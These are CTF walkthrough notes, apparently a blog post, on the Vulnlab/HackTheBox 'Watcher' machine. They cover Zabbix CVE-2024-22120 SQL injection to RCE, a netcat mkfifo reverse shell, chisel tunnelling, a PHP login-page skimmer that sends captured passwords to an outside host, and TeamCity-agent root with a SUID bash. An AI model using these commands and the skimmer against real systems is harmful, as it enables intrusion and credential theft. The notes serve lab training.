WATCHER-HTB Notes

Here is my notes on WATCHER box from Vulnlab which deployed to Hackthebox.
WATCHER: 10.10.97.38

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 f0e4e7ae272214090cfe1aaa85a8c3a5 (ECDSA)
|_  256 fda3b9361739251d406d5a0797b34213 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://watcher.vl/

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://10.10.97.38 -H "HOST: FUZZ.watcher.vl" --fs 4991

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://10.10.97.38/ -H "HOST: FUZZ.watcher.vl" --fs 4991

zabbix                  [Status: 200, Size: 3946, Words: 199, Lines: 33, Duration: 323ms]

zabbix.watcher.vl: 

No default creds. 

Sign in as guest - Interesting one. 

Login as guest as usual. 

Zabbix 7.0.0alpha1 


https://github.com/W01fh4cker/CVE-2024-22120-RCE


zbx_session=eyJzZXNzaW9uaWQiOiIxMWQ5MjJmZTAxODg2MTVhYTFmNjE2NDQxYzU0MTI5ZSIsInNlcnZlckNoZWNrUmVzdWx0Ijp0cnVlLCJzZXJ2ZXJDaGVja1RpbWUiOjE3MzIwMzU3ODQsInNpZ24iOiIwOGVlYTE5OTNhMWVjODFkNzk3ZjVhMzE5ZmM5NzdkMTFiOTgwNTAyY2FjNjVjODM3YzRjMDQ1ZGYxMjQwZWU0In0%3D

Base64 Decoded: 

{"sessionid":"e29c48d946f1a3135fe7ceec60d0ff0d","serverCheckResult":true,"serverCheckTime":1732035784,"sign":"08eea1993a1ec81d797f5a319fc977d11b980502cac65c837c4c045df1240ee4"}

hostid=10084

python3 CVE-2024-22120-RCE.py --ip 10.10.97.38 --sid e29cc8d946f1a3135fe7ceec60d0ff0d --hostid 10084

python3 zabbix_server_time_based_blind_sqli.py --ip 10.10.79.255 --sid e29cc8d946f1a3135fe7ceec60d0ff0d --hostid 10084 | grep "(+)" 


e29cc8d946f1a3135fe7ceec60d0ff0d


(+) session_id=e29c48d946f1a3135fe7ceec60d0ff0d
(+) admin session_id=e29c48d946f1a3135fe7ceec60d0ff0d
(+) session_key=b9857bc76e26cf108766043dbf43544b, admin session_id=e29c48d946f1a3135fe7ceec60d0ff0d. Now you can genereate admin zbx_cookie and sign it with session_key





python3 zabbix_server_time_based_blind_sqli.py --ip 10.10.97.38 --sid e29cc8d946f1a3135fe7ceec60d0ff0d --hostid 10084 | grep "(+)" 


zbx_session=eyJzZXNzaW9uaWQiOiIxMzYyYTYxMDAyYjY3ZGNkYTBkNDY4MWEzMTk2N2I5MSIsInNpZ24iOiJmMTIxNmM1OGU3ZGVhMzY4N2IyYzQ3MjIyZDk4OGFhN2Y5ZmY0MDNjZTMyNzk4YWJjODg5NzY0OTA2YmRlMWVmIn0%3D

Base64 Decoded: 

{"sessionid":"1362a61002b67dcda0d4681a31967b91","sign":"f1216c58e7dea3687b2c47222d988aa7f9ff403ce32798abc889764906bde1ef"}

hostid=10084

python3 CVE-2024-22120-RCE.py --ip 10.10.112.2 --sid 1362a61002b67dcda0d4681a31967b91 --hostid 10084


python3 CVE-2024-22120-RCE.py --ip zabbix.watcher.vl --sid 1362a61002b67dcda0d4681a31967b91 --hostid 10084

(!) sessionid=e29cc8d946f1a3135fe7ceec60d0ff0d
[zabbix_cmd]>>:  whoami
zabbix

[zabbix_cmd]>>:  hostname
watcher.vl

RCE-ACHIEVED ! 


Convert it into a user-shell as usual.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.0.71 4444 >/tmp/f

zabbix@watcher:/$ whoami
whoami
zabbix
zabbix@watcher:/$ hostname
hostname
watcher.vl

USER-SHELL ! 

zabbix@watcher:/$ whoami
whoami
zabbix
zabbix@watcher:/$ hostname
hostname
watcher.vl
zabbix@watcher:/$ cat user.txt
cat user.txt
VL{REDIRECTED}

USER.TXT: VL{REDIRECTED}
 


PRIV ESC: 

PSPY64S: 

[SNIP]

2025/01/21 17:01:26 CMD: UID=115  PID=1455   | /usr/local/sbin/zabbix_server: configuration syncer [synced configuration in 0.089428 sec, idle 10 sec]
2025/01/21 17:01:26 CMD: UID=115  PID=1454   | /usr/local/sbin/zabbix_server: service manager #1 [processed 0 events, updated 0 event tags, deleted 0 problems, synced 0 service updates, idle 5.011535 sec during 5.011594 sec]
2025/01/21 17:01:26 CMD: UID=115  PID=1453   | /usr/local/sbin/zabbix_server: ha manager
2025/01/21 17:01:26 CMD: UID=115  PID=1449   | /usr/local/sbin/zabbix_server -c /usr/local/etc/zabbix_server.conf
2025/01/21 17:01:26 CMD: UID=0    PID=14     |
2025/01/21 17:01:26 CMD: UID=0    PID=1340   | /usr/lib/jvm/java-1.11.0-openjdk-amd64/bin/java -ea -Xms16m -Xmx64m -cp ../launcher/lib/launcher.jar jetbrains.buildServer.agent.Launcher -ea -XX:+DisableAttachMechanism --add-opens=java.base/java.lang=ALL-UNNAMED -XX:+IgnoreUnrecognizedVMOptions -Xmx384m -Dteamcity_logs=../logs/ -Dlog4j2.configurationFile=file:../conf/teamcity-agent-log4j2.xml jetbrains.buildServer.agent.AgentMain -file ../conf/buildAgent.properties
2025/01/21 17:01:26 CMD: UID=0    PID=13     |
2025/01/21 17:01:26 CMD: UID=116  PID=1267   | /usr/sbin/mysqld
2025/01/21 17:01:26 CMD: UID=0    PID=12     |
2025/01/21 17:01:26 CMD: UID=0    PID=112    | /lib/systemd/systemd-journald
2025/01/21 17:01:26 CMD: UID=0    PID=11     |
2025/01/21 17:01:26 CMD: UID=0    PID=1010   | /usr/lib/jvm/java-1.11.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/root/TeamCity/conf/logging.alDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -server -Xmx2g -Dteamcity.configuration.path=../conf/teamcity-startup.properties -Dlog4j2.configurationFile=file:/root/TeamCity/bin/../conf/teamcity-server-log4j.xml -Dteamcity_logs=/root/TeamCity/bin/../logs -Djava.awt.headless=true -Dignore.endorsed.dirs= -classpath /root/TeamCity/bin/bootstrap.jar:/root/TeamCity/bin/tomcat-juli.jar -Dcatalina.base=/root/TeamCity -Dcatalina.home=/root/TeamCity -Djava.io.tmpdir=/root/TeamCity/temp org.apache.catalina.startup.Bootstrap start
2025/01/21 17:01:26 CMD: UID=0    PID=1      | /sbin/init
2025/01/21 17:01:58 CMD: UID=0    PID=4645   |
2025/01/21 17:02:01 CMD: UID=115  PID=4650   | sh -c who | wc -l
2025/01/21 17:02:01 CMD: UID=115  PID=4652   | wc -l
2025/01/21 17:02:01 CMD: UID=115  PID=4651   | sh -c who | wc -l
2025/01/21 17:02:01 CMD: UID=0    PID=4653   | /usr/sbin/CRON -f -P
2025/01/21 17:02:01 CMD: UID=0    PID=4654   | /bin/sh -c /usr/bin/python3 /root/scripts/login.py
2025/01/21 17:02:01 CMD: UID=0    PID=4655   | /usr/bin/python3 /root/scripts/login.py
2025/01/21 17:02:13 CMD: UID=0    PID=4657   | df -k /root/.BuildServer/system

There is a TeamCity run on TCP port 8111.

./chisel server -p 53 --reverse
./chisel client 10.8.0.71:53 R:8111:127.0.0.1:8111


It seems logins.py link to the login page of zabbix and we can modify index.php of zabbix by embed the malicious with the original one. 

Malicious embedded index.php:

$name = $_POST['name'] ?? 'Unknown';
$password = $_POST['password'] ?? 'Unknown';

// Prepare the log entry
//$logEntry = "Name: " . $name . ", Password: " . $password . "\n";

// Write the log entry to the file /tmp/log.txt
// The FILE_APPEND flag ensures the entry is added at the end of the file
// The file will be created if it does not exist
//file_put_contents('/tmp/log.txt', $logEntry, FILE_APPEND);
file_get_contents('http://REDACTED/x?name=' . $_POST['name'] . '&pass=' . $password);
//echo "Data logged successfully2!";


$name = $_POST['name'] ?? 'Unknown';
$password = $_POST['password'] ?? 'Unknown';

// Prepare the log entry
//$logEntry = "Name: " . $name . ", Password: " . $password . "\n";

// Write the log entry to the file /tmp/log.txt
// The FILE_APPEND flag ensures the entry is added at the end of the file
// The file will be created if it does not exist
//file_put_contents('/tmp/log.txt', $logEntry, FILE_APPEND);
file_get_contents('http://10.8.0.71/x?name=' . $_POST['name'] . '&pass=' . $password);

Example: #Embedding Malicious files into original index.php

[SNIP]

session_write_close();

$name = $_POST['name'] ?? 'Unknown';
$password = $_POST['password'] ?? 'Unknown';

// Prepare the log entry
//$logEntry = "Name: " . $name . ", Password: " . $password . "\n";

// Write the log entry to the file /tmp/log.txt
// The FILE_APPEND flag ensures the entry is added at the end of the file
// The file will be created if it does not exist
//file_put_contents('/tmp/log.txt', $logEntry, FILE_APPEND);
file_get_contents('http://10.8.0.71/x?name=' . $_POST['name'] . '&pass=' . $password);
//echo "Data logged successfully2!"; 

Then wait for a few minutes to respond. 

file_put_contents('/usr/share/zabbix/blablabla',print_r($_POST,true),FILE_APPEND);
root@watcher:/usr/share/zabbix# tail -f blablabla 
Array
(
    [name] => Frank
    [password] => R%)3S7^Hf4TBobb(gVVs
    [enter] => Sign in
)

#If there is an issues like Unknown then just move on and use frank creds. 

frank:R%)3S7^Hf4TBobb(gVVs

python3 -c 'import pty; pty.spawn("/bin/bash")'

TeamCity: 

frank:R%)3S7^Hf4TBobb(gVVs


Teamspeak has AGENT.

AGENT = linux = ROOT RCE ! through the terminal. 

# whoami
root
# hostname
watcher.vl
# chmod u+s /bin/bash

bash-5.1$ whoami
whoami
zabbix
bash-5.1$ ls -lah /bin/bash
ls -lah /bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 14  2024 /bin/bash
bash-5.1$ /bin/bash -p
/bin/bash -p
whoami
root
id
uid=115(zabbix) gid=122(zabbix) euid=0(root) groups=122(zabbix)
hostname
watcher.vl

ROOT-SHELL ! 

pwd
/root
ls
TeamCity
root.txt
scripts
snap
cat root.txt
VL{REDIRECTED}

ROOT.TXT: VL{REDIRECTED}
 




10050/tcp open  zabbix-agent
10051/tcp open  zabbix-trapper
39743/tcp open  java-rmi   Java RMI
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


https://github.com/dpgg101/VulnLab/blob/main/Watcher/Watcher.md

https://github.com/purplestormctf/Writeups/blob/main/vulnlab/machines/Watcher/Watcher.md
More posts

ATLAS-HTB Notes

ARTIFICIAL-HTB Notes

Learn Hacking By Examples

SLONIK-HTB Notes
